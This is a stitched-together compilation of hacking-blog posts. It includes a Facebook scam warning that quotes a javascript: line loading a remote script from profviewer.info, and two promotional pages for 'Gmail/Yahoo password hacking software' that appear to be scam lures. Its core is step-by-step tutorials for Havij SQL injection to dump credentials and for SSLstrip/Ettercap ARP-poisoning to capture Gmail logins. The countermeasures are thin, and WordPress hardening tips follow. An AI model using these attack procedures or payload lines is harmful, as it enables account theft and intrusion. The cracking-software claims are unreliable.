Be Careful of Facebook.com Lady Gaga Hacks!

Today, my friend got a message from one of his friends:
Since this seemed quite suspicious, I paid attention and followed it through to the end.
Then, on clicking CONTINUE, tricky instructions appear:
And indeed, the process asks for JavaScript to be entered in the address bar!
javascript: (a = (b = document). createElement ('script')). src =
'Http://profviewer.info/new.js' b.body.appendChild (a): void (0)
Just press ENTER and all your friends will get the same private message I showed you at the beginning of this post.


Please share this post everywhere so that your friends and Facebook stay away from being hacked!
Those who are interested in that Lady Gaga page, please explore it more.

Gmail Password Hacking Software Free Download


Get your lost Gmail passwords back with our FREE Gmail password hacking software!

We are offering our free Gmail password hacking software free of charge through this website for a limited time only! Our Gmail password hack allows you to retrieve your lost or forgotten Gmail password completely free of charge. Reliable Gmail hacking software is pretty tough to locate on the Internet, especially FREE Gmail hacking software!

Our Gmail password hacking program is called Gmail Password Retriever PRO. It is designed with the average Internet user in mind, which means it's really easy to use: you can now retrieve Gmail passwords through a simple 1,2,3 process! Gmail hacking has never been easier!

Gmail Password Retriever PRO: Free Download



How to Hack a Gmail Account?

1) Download and install the software shown below.

2) Select the Gmail account you want hacked and click crack.

3) You're done!

(Screenshot of the Gmail Hacker PRO)
Gmail Password Hacking Software Free Download - Screenshot

By clicking on the download link above you certify your agreement with, and that you are bound by, our ToS & AUP.

This application has been created with the intent to help users looking to hack Gmail passwords. You have most likely already searched on the internet countless times on "how to hack Gmail" or "Gmail password hacking" to no avail. Our free Gmail password hacking software offers its user the ability to crack a Gmail account password in less than 30 seconds per account. Gmail hacking has never been as easy and fast as it is now. All that's required on your end to get started and to do your first Gmail password crack is to download our free Gmail hacking software and install it on your system now! This is a very limited offer and will expire shortly.

Important information: You must agree to our Terms and Conditions before browsing our website and/or using, reviewing, downloading and installing our software. We are only providing lost or forgotten information recovery related products on our website. You should never use our products, services or materials on our website for any hacking or cracking related activities that may infringe any law of any country or territory in any direct or indirect manner.

Free Yahoo Password Hacking Software


Get your lost Yahoo passwords back with our FREE Yahoo password hacking software!

We are offering our free Yahoo password hacking software free of charge through this website for a limited time only! Our Yahoo password hack allows you to retrieve your lost or forgotten Yahoo password completely free of charge. Reliable Yahoo hacking software is pretty tough to locate on the Internet, especially FREE Yahoo hacking software!

Our Yahoo password hacking program is called Yahoo Password Retriever PRO. It is designed with the average Internet user in mind, which means it's really easy to use: you can now retrieve Yahoo passwords through a simple 1,2,3 process! Yahoo hacking has never been easier!

Yahoo Password Retriever PRO: Free Download


How to Hack a Yahoo Account?

1) Download and install the software shown below.

2) Select the Yahoo account you want hacked and click crack.

3) You're done!

(Screenshot of the Yahoo Hacker PRO)
Free Yahoo Password Hacking Software Screenshot

By clicking on the download link above you certify your agreement with, and that you are bound by, our ToS & AUP.

This application has been created with the intent to help users looking to hack Yahoo passwords. You have most likely already searched on the internet countless times on "how to hack Yahoo" or "Yahoo password hacking" to no avail. Our free Yahoo password recovery tool offers its user the ability to hack Yahoo passwords in less than 30 seconds per account. Yahoo hacking has never been as easy and fast as it is now. All that's required on your end to get started and to do your first Yahoo password crack is to download our free Yahoo hacking software and install it on your system now! This is a very limited offer and will expire shortly.

Important information: You must agree to our Terms and Conditions before browsing our website and/or using, reviewing, downloading and installing our software. We are only providing lost or forgotten information recovery related products on our website. You should never use our products, services or materials on our website for any hacking or cracking related activities that may infringe any law of any country or territory in any direct or indirect manner.



Lots of people think that JavaScript is an inferior language, but JavaScript is an extremely powerful language, and those who think otherwise either don't know how to use it or are not familiar with its capabilities. With JavaScript you can do lots of cool things, such as edit any page or make an image fly, but it is a waste of time to spend it on making images fly or editing a page.
Anyway, coming to the main topic: did you know that JavaScript can be used to detect whether a page is a spoofed or phishing website or a legitimate one? If you don't, just paste the following code into the address bar and a pop-up will appear telling you whether the website is original or not.
Here is the JavaScript code:

javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");
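The same comparison (the host actually contacted versus the full address shown) can be run offline on a URL taken from a suspicious message. This Python sketch is an added example, not code from the original post; it goes beyond the bookmarklet by checking against the domain you expected, and the function names and the `bank.example` addresses are constructed assumptions.

```python
from urllib.parse import urlsplit

def real_host(url):
    """Return the host the browser will actually contact for this URL."""
    host = urlsplit(url).hostname or ""
    return host.rstrip(".").lower()

def spoof_warnings(url, expected_domain):
    """List the reasons this URL may not belong to expected_domain."""
    parts = urlsplit(url)
    host = real_host(url)
    expected = expected_domain.lower()
    warnings = []
    # "http://www.bank.example@203.0.113.7/" : everything before '@' is a username.
    if parts.username is not None:
        warnings.append("text before '@' is a username, not the server name")
    # The host must be the expected domain itself or one of its subdomains.
    if host != expected and not host.endswith("." + expected):
        warnings.append("real host %r is not %r or a subdomain of it" % (host, expected))
        if expected in url.lower():
            warnings.append("expected name appears in the URL, but not as the host")
    # Look-alike characters are carried in punycode labels.
    if any(label.startswith("xn--") for label in host.split(".")):
        warnings.append("host contains a punycode (internationalized) label")
    if parts.scheme != "https":
        warnings.append("connection is not HTTPS")
    return warnings

if __name__ == "__main__":
    # Constructed sample URLs for illustration.
    for sample in ("https://www.bank.example/login",
                   "http://www.bank.example@203.0.113.7/login",
                   "https://bank.example.secure-login.test/"):
        print(sample, "->", real_host(sample), spoof_warnings(sample, "bank.example"))
```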


SQL Injection Tutorial with Havij

According to a survey, the most common technique for hacking a website is SQL injection. SQL injection is a technique in which a hacker inserts SQL code into web forms to get sensitive information (such as usernames and passwords) in order to access the site and deface it. The traditional SQL injection method is quite difficult, but nowadays there are many tools available online through which any script kiddie can use SQL injection to deface a website; because of these tools, websites have become more vulnerable to these types of attacks.

One of the popular tools is Havij. Havij is an advanced SQL injection tool which makes SQL injection very easy; along with SQL injection, it has a built-in admin page finder, which makes it very effective.


Warning - This article is for educational purposes only. By reading this article you agree that HWA is not responsible in any way for any kind of damage caused by the information provided in this article.


Supported Databases With Havij

  • MsSQL 2000/2005 with error.
  • MsSQL 2000/2005 no error union based
  • MySQL union based
  • MySQL Blind
  • MySQL error based
  • MySQL time based
  • Oracle union based
  • MsAccess union based
  • Sybase (ASE)

Demonstration

Now I will show you the process of SQL injection step by step.

Step1: Find a SQL injection vulnerability in your site and insert its URL string (like http://www.target.com/index.asp?id=123) into Havij as shown below.



Step3: Now click on the Analyse button as shown below.



Now if your server is vulnerable, the information about the target will appear, and the columns will appear as shown in the picture below:


Step4: Now click on the Tables button and then click Get Tables button from below column as shown below:


Step5: Now select the tables with sensitive information and click the Get Columns button. After that, select the Username and Password columns to get the username and password, and click on the Get Table button.

Countermeasures:

Here are some of the countermeasures you can take to reduce the risk of SQL injection:

1. Renaming the admin page will make it difficult for a hacker to locate it.

3. Use an intrusion detection system and compose signatures for popular SQL injection strings.

4. One of the best methods to protect your website against SQL injection attacks is to disallow special characters in the admin form. This will make your passwords more vulnerable to brute-force attacks, but you can implement a CAPTCHA to prevent these types of attack.
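The countermeasures above work around the flaw; the flaw itself is user input being pasted into the SQL text. This added Python example (not part of the original article) shows an `id=123` style lookup built by string concatenation beside the same lookup with type validation and a bound parameter. The `articles` table, its rows and the function names are constructed assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data: an in-memory table standing in for the site's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                   [(123, "Public post", 0), (124, "Draft", 1), (125, "Admin notes", 1)])
    return db

def lookup_concatenated(db, raw_id):
    # Vulnerable pattern: the id parameter becomes part of the SQL text,
    # so the database parses whatever the visitor typed as SQL.
    sql = "SELECT title FROM articles WHERE hidden = 0 AND id = " + raw_id
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, raw_id):
    # Hardened pattern: reject anything that is not a plain number, then bind it.
    # A bound value is only ever data; it cannot change the query structure.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []
    sql = "SELECT title FROM articles WHERE hidden = 0 AND id = ?"
    return [row[0] for row in db.execute(sql, (int(raw_id),))]

if __name__ == "__main__":
    db = make_db()
    tautology = "123 OR 1=1"  # textbook test string; the OR clause defeats the hidden = 0 filter
    print("concatenated :", lookup_concatenated(db, tautology))
    print("parameterized:", lookup_parameterized(db, tautology))
```

With bound parameters there is no need to ban special characters from passwords, so the brute-force trade-off described in item 4 does not arise.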

Man In The Middle Attack - SSL Hacking

One of the most successful ways of gaining information such as passwords and user IDs on a LAN (local area network) is through man-in-the-middle attacks. I will not be going too deep into man-in-the-middle attacks, but in simple words it can be explained as an attacker or a hacker listening to all the information sent between the client and the server. To prevent these kinds of attacks, email providers started using Hypertext Transfer Protocol Secure (HTTPS). It is a combination of the Hypertext Transfer Protocol (HTTP) with the SSL (Secure Sockets Layer) protocol to provide encrypted communication between the client and the server. So when a hacker carries out a MITM attack, the victim is cautioned with an invalid SSL certificate.



In this tutorial I will teach how to carry out a successful MITM attack.

Concept :-

We know that HTTP (Hypertext Transfer Protocol) simply sends all the information as plain text. So if we make the victim use HTTP instead of HTTPS to connect to sites like Gmail and PayPal, we will be able to carry out a successful MITM attack without causing any suspicion. To do this we are going to use a tool called SSL strip.


Things We Need

1. SSL strip: You can search Google for SSL strip; it comes in both Windows and Linux versions. I will be using the Windows version in this tutorial.

2. Ettercap, to carry out MITM attacks

Demonstration :-

1. Open SSL strip and fill in all the required information for arpspoof, network, SSL strip and change data. If you don't know what to enter, simply click auto check. Remember to check that HTTPS to HTTP is included in Change data, and finally click OK.



2. Now select the victim’s IP and click open


3. Now open Ettercap, go to sniff - unsniffed sniffing, select your network interface and click OK.



4. Now select hosts - scan hosts. Once scanning is completed, open the host list from the hosts tab. Now select the IP address of the router as target 1 and the victim's IP as target 2.



5. Now select mitm - arp poisoning and click OK as shown.



6. Finally select start - start sniffing. Now when the victim logs into Gmail he will be using HTTP and not HTTPS, hence we are able to get the user ID and passwords as shown below.



Counter measures:

1. Whenever you perform an online transaction such as a credit card payment, bank login or email login, always ensure that you use HTTPS.

2. Always check the SSL certificate before doing an online transaction.
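The attack above depends on ARP poisoning, which leaves a trace on the victim's machine: the router's IP and another host's IP resolve to the same MAC address. This added Python example (not part of the original tutorial) parses `arp -a` style output and reports such collisions. The sample table, its addresses and the function names are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: `arp -a` style output from a LAN host (addresses are made up).
SAMPLE_ARP = """\
? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.23) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.40) at 66:77:88:99:aa:bb [ether] on eth0
"""

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MAC_RE = re.compile(r"\b(?:[0-9a-f]{1,2}[:-]){5}[0-9a-f]{1,2}\b", re.I)

def normalize_mac(mac):
    # Accept both aa-bb-.. (Windows) and a:b:.. (unpadded) spellings.
    return ":".join(part.zfill(2) for part in re.split(r"[:-]", mac.lower()))

def parse_arp_table(text):
    """Return (ip, mac) pairs from every line that contains both."""
    entries = []
    for line in text.splitlines():
        ip, mac = IP_RE.search(line), MAC_RE.search(line)
        if ip and mac:
            entries.append((ip.group(), normalize_mac(mac.group())))
    return entries

def shared_macs(entries, ignore=("ff:ff:ff:ff:ff:ff",)):
    """Map each MAC claimed by more than one IP to the IPs claiming it."""
    by_mac = defaultdict(set)
    for ip, mac in entries:
        if mac not in ignore:
            by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_is_impersonated(entries, gateway_ip):
    # True when some other IP shares the gateway's MAC in this table.
    return any(gateway_ip in ips for ips in shared_macs(entries).values())

if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP)
    print(shared_macs(table))
    print("gateway impersonated:", gateway_is_impersonated(table, "192.168.1.1"))
```

A shared MAC is a signal to investigate, not proof: proxy ARP and multi-homed hosts produce the same pattern legitimately.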

How To Secure Your Wordpress Blogs?


Hackers are people like you and us; the only difference is that they use their skills for negative and destructive purposes. They use their skills to break a website and normally destroy everything, so if you are the admin of a website you should care about its security.
As you know, WordPress is a common and most popular platform for blogging, but the security of WordPress is always a hot topic of discussion, and it needs more and more attention because vulnerabilities are discovered every day. Below are some tips to make your blog secure:

Secure WP-Admin By IP

Suppose someone obtains the credentials (username and password) to enter the WP-Admin section of your website: you can restrict this area to your IP. This prevents brute-force attacks, and only you will be able to control your website because of the IP restriction.

# Place in the .htaccess file of the wp-admin directory
Order deny,allow
Deny from All
# Replace with your own IP address
Allow from 123.456.789.0

You can allow and deny IPs from a range; use this:

order deny,allow
deny from all
# allow my home IP address
allow from XX.XX.XXX.XXX
# allow my work IP address
allow from XX.XX.XXX.XXX


Protect WP-Config.php File

The WP-Config.php file is of great importance on the WordPress platform and needs more care; an attacker usually gets the required information about your website's database from the WP-Config file. Basically, if you use a strong database username and password while your WP-Config security is low, then an attacker can get your strong username and password from the wp-config file, because it contains all the information about the security and other settings of your website.

The .htaccess file is located at the root of your WordPress installation; open it and paste the following code.

<Files wp-config.php>
order allow,deny
deny from all
</Files>




Hide WordPress Version Number

You must hide the version of your WordPress because an attacker may find an available exploit by searching different exploit databases by version number, and it may cause great harm to your blog, so be careful about it.

A tag in the header.php file displays your current version of WordPress.

Copy and paste the code into the functions.php file of your theme and then you are done.


remove_action('wp_head', 'wp_generator');

Remove Error Message From Login Screen

This is a clever move: remove the error message so that an attacker is not able to see whether the username or password was incorrect. Update your functions.php with this code.

// Return nothing instead of the message that says which login field was wrong
add_filter('login_errors', function ($a) { return null; });


Some Other Security Tips

Use your mind, because the mind is an essential part of securing yourself in the jungle of the web.

  • Create strong passwords that cannot easily be guessed or cracked.
  • Secure your own side (your computer) from different malware.
  • Make regular backups of your blog.
  • Update your WordPress to the latest version.
  • Use SSH instead of FTP.
  • Avoid using your account in public places.
  • You must be aware of different attacks to secure yourself.